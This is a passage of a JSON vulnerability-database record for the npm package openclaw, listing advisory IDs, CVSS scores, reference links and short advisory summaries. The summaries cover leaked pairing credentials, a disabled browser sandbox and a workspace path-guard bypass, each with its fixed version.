sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-8j7f-g9gv-7jhc"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mggy-bv5s-5uax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91827?format=json","vulnerability_id":"VCID-mkka-hf2q-pfhp","summary":"OpenClaw: Pairing setup codes exposed long-lived shared gateway credentials instead of short-lived bootstrap tokens\n### Summary\n\nOpenClaw pairing setup codes generated by `/pair` and `openclaw qr` embedded the configured shared gateway token or password directly in the setup payload. Anyone who obtained that code from chat history, logs, screenshots, or copied QR payloads could recover the long-lived shared credential.\n\n### Impact\n\nAn attacker with access to a leaked setup code could reuse the shared gateway credential outside the intended one-time pairing flow.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Setup codes now carry short-lived bootstrap tokens that are only valid for the initial device bootstrap exchange. Update to `2026.3.12` or later and rotate any previously exposed shared gateway credentials if setup codes may have leaked.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj"},{"reference_url":"https://github.com/advisories/GHSA-7h7g-x2px-94hj","reference_id":"GHSA-7h7g-x2px-94hj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7h7g-x2px-94hj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["GHSA-7h7g-x2px-94hj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mkka-hf2q-pfhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91571?format=json","vulnerability_id":"VCID-mqzw-sq85-9ba2","summary":"Duplicate Advisory: OpenClaw has an improper sandbox configuration vulnerability\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-43x4-g22p-3hrq. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.21 contain an improper sandbox configuration vulnerability that allows attackers to execute arbitrary code by exploiting renderer-side vulnerabilities without requiring a sandbox escape. Attackers can leverage the disabled OS-level sandbox protections in the Chromium browser container to achieve code execution on the host system.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1835dec2004fe7a62c6a7ba46b8485f124ec6199","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1835dec2004fe7a62c6a7ba46b8485f124ec6199"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e7eba01efc4c3c400e9cfd3ce3d661cbc788a631","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e7eba01efc4c3c400e9cfd3ce3d661cbc788a631"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-os-level-sandbox-bypass-via-no-sandbox-flag","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-os-level-sandbox-bypass-via-no-sandbox-flag"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32046","reference_id":"CVE-2026-32046","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32046"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-43x4-g22p-3hrq","reference_id":"GHSA-43x4-g22p-3hrq","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-43x4-g22p-3hrq"},{"reference_url":"https://github.com/advisories/GHSA-q94v-v6m9-jhq9","reference_id":"GHSA-q94v-v6m9-jhq9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q94v-v6m9-jhq9"}],"fixed_packages":[],"aliases":["GHSA-q94v-v6m9-jhq9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mqzw-sq85-9ba2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89450?format=json","vulnerability_id":"VCID-mszk-dr24-xugw","summary":"OpenClaw: screen_record outPath bypassed workspace-only filesystem guard\n## Summary\n\nscreen_record outPath bypassed workspace-only filesystem guard.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe node-host screen recording tool could honor an `outPath` outside the workspace guard, allowing an authorized tool call to write outside the intended workspace boundary.\n\n## Technical Details\n\nThe fix applies the workspace-root guard to node tool `outPath` handling, including screen recording paths.\n\n## Fix\n\nThe issue was fixed in #63551. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `635bb35b68d8faa5bfa2fda35feadd315122748a`\n- PR: #63551\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @anshumanbh for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43567","reference_id":"","reference_type":"","scores":[{"value":"0.00029","scoring_system":"epss","scoring_elements":"0.08891","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10398","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.1044","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43567"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/635bb35b68d8faa5bfa2fda35feadd315122748a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","sco